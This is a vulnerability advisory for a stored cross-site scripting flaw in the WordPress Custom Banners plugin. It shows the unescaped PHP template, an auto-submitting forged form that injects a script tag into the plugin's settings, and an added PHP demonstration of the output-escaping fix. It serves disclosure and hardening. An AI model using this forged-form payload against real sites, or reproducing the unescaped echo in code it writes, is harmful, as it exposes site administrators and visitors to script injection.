WordPress Custom Banners 1.2.2.2 Cross Site Scripting
Posted on 01 July 2014
######################
# Exploit Title : Wordpress custom-banners 1.2.2.2 Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/custom-banners/
# Software Link : http://downloads.wordpress.org/plugin/custom-banners.zip
# Date : 2014-06-28
# Tested on : Windows 7 / Mozilla Firefox
######################
# Vulnerable code :

<table class="form-table">
    <tr valign="top">
        <th scope="row"><label for="custom_banners_registered_name">Email Address</label></th>
        <td><input type="text" name="custom_banners_registered_name" id="custom_banners_registered_name" value="<?php echo get_option('custom_banners_registered_name'); ?>" style="width: 250px" />
        <p class="description">This is the e-mail address that you used when you registered the plugin.</p>
        </td>
    </tr>
</table>

######################
Exploit Code:

<html>
<body>
<form name="post_form" method="post" action="http://localhost/wp-admin/options.php">
<input type='hidden' name='option_page' value='custom-banners-settings-group' />
<input type="hidden" name="action" value="update" />
<input type="hidden" id="_wpnonce" name="_wpnonce" value="8fcfa93c1a" />
<input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=custom-banners%2Flib%2Fcustom_banners_options.php&settings-updated=true" />
<input type="hidden" name="custom_banners_registered_name" id="custom_banners_registered_name" value='"/><script>alert(1);</script>'/>
<script language="Javascript">
setTimeout('post_form.submit()', 1);
</script>
</form>
</body>
</html>

#####################
Discovered By : ACC3SS
#####################
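The vulnerable template echoes the stored option straight into a double-quoted value attribute, so the fix is to escape it for the attribute context on output. The script below is an added example, not code from the plugin or from the advisory: attr_escape, render_field and has_script_tag are hypothetical helpers, and attr_escape stands in for WordPress's esc_attr() so the comparison runs with the PHP CLI alone.

```php
<?php
// Added example (not the plugin's code). Runs outside WordPress.

// Stand-in for WordPress's esc_attr(): encodes & < > " and ' so the value
// can neither close the attribute nor open a new tag.
function attr_escape(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: renders the settings field shown in the advisory,
// with or without output escaping.
function render_field(string $stored, bool $escape): string {
    $value = $escape ? attr_escape($stored) : $stored;
    return '<input type="text" name="custom_banners_registered_name" '
         . 'id="custom_banners_registered_name" value="' . $value . '" '
         . 'style="width: 250px" />';
}

// Hypothetical check: does the rendered markup carry a live script tag?
function has_script_tag(string $html): bool {
    return stripos($html, '<script') !== false;
}

// Option value as stored by the advisory's proof of concept.
$stored = '"/><script>alert(1);</script>';

$before = render_field($stored, false); // original template behaviour
$after  = render_field($stored, true);  // hardened template behaviour

echo "unescaped: ", $before, "\n";
echo "escaped:   ", $after, "\n";
echo "script tag before fix: ", var_export(has_script_tag($before), true), "\n";
echo "script tag after fix:  ", var_export(has_script_tag($after), true), "\n";

// Equivalent change inside the plugin template:
//   echo esc_attr( get_option('custom_banners_registered_name') );
//
// Defence in depth on write, assuming the plugin registers the option with
// register_setting() under the group name seen in the form above:
//   register_setting( 'custom-banners-settings-group',
//                     'custom_banners_registered_name',
//                     'sanitize_text_field' );
```

Escaping on output is the required fix; the sanitize callback only reduces what can be stored and does not replace it.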
